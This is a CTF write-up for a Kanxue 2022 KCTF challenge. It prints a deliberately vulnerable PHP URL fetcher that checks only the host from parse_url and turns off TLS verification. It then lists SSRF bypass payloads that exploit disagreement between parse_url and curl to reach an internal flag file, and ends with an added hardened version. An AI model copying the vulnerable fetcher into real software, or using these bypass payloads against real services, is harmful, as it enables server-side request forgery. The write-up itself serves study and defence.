About the challenge author team
Challenge design approach
<?php
function curl_request($url, $data=null, $method='get', $header = array("content-type: application/json"), $https=true, $timeout = 5){
    $method = strtoupper($method);
    $ch = curl_init();// initialize
    curl_setopt($ch, CURLOPT_URL, $url);// URL to request
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);// return the page content instead of printing it
    if($https){
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);// https request: do not verify the certificate
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);// https request: do not verify the host
    }
    if ($method != "GET") {
        if($method == 'POST'){
            curl_setopt($ch, CURLOPT_POST, true);// send as a POST request
        }
        if ($method == 'PUT' || strtoupper($method) == 'DELETE') {
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); // set the request method
        }
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);// request data
    }
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header); // request headers to send
    //curl_setopt($ch, CURLOPT_HEADER, false);// do not include response headers
    $result = curl_exec($ch);// execute the request
    curl_close($ch);// close curl and release resources
    return $result;
}
$url=$_GET["url"];
$uu=parse_url($url);
$host=isset($uu["host"])?$uu["host"]:"";
$scheme=isset($uu["scheme"])?$uu["scheme"]:"";
if(empty($host)){
    die("host is null");
}
if(empty($scheme)){
    die("scheme is null");
}
//https://ctf.pediy.com/upload/team/762/team236762.png?
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
    //echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
    echo curl_request($url,'',"get",[],true,5);
}else{
    die("host not allow");
}
?>
Challenge analysis
This analysis was provided by Kanxue forum member KEEEY:
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
/phpinfo.php
/url.php?url=
http://121.36.145.157:8044/url.php -> returns 200
http://121.36.145.157:8044/urL.php -> returns 404
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
http://u:p@123.57.254.42@127.0.0.1/
http://123.57.254.42#@127.0.0.1/
http://123.57.254.42{%00-%FF}{%00-%FF}127.0.0.1/
http://123.57.254.42{%00-%FF}127.0.0.1{%00-%FF}
...
scheme://user:pass@host:port/path?query
123.57.254.42://127.0.0.1
123.57.254.42://127.0.0.1/../flag.php
scheme
host
../flag.php -> path
host
/127.0.0.1/../flag.php -> path
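Added example (not part of the original write-up or the challenge code): one way to harden the url.php check so that curl only ever receives a URL rebuilt from the components that were validated, which closes the gap between what parse_url() approves and what curl requests. The function names and the allow-list are assumptions for illustration; the loopback hosts from the challenge are left out of the allow-list on purpose.

```php
<?php
// Added example, not the challenge's code. Names and allow-lists are illustrative.
const ALLOWED_SCHEMES = ['http', 'https'];
const ALLOWED_HOSTS   = ['ctf.pediy.com'];

// Returns a URL rebuilt from validated components, or null if the input is rejected.
function canonical_allowed_url(string $url): ?string {
    // Reject control characters, whitespace and backslashes, which URL parsers treat differently.
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $url)) {
        return null;
    }
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    $host   = strtolower($p['host']);
    // The challenge only checked that a scheme existed; require an exact allow-list match.
    if (!in_array($scheme, ALLOWED_SCHEMES, true) || !in_array($host, ALLOWED_HOSTS, true)) {
        return null;
    }
    // Userinfo and fragments are not needed here and invite parser disagreement.
    if (isset($p['user']) || isset($p['pass']) || isset($p['fragment'])) {
        return null;
    }
    $port  = isset($p['port']) ? ':' . $p['port'] : '';
    $path  = $p['path'] ?? '/';
    $query = isset($p['query']) ? '?' . $p['query'] : '';
    // Rebuild the URL so curl never re-parses the raw user input.
    return "$scheme://$host$port$path$query";
}

function fetch_allowed(string $url, int $timeout = 5) {
    $safe = canonical_allowed_url($url);
    if ($safe === null) {
        return false;
    }
    $ch = curl_init($safe);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => $timeout,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // no other curl handlers
        CURLOPT_FOLLOWLOCATION => false, // a redirect would bypass the host check
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
    ]);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
```

With this check, an input whose part before :// is not http or https is rejected before curl is called, so the two parsers never get the chance to disagree about which part is the host.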
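Originally published on the WeChat official account 看雪学苑 (Kanxue Academy): Kanxue 2022 KCTF Spring Contest | Challenge 4 Design Approach and Analysis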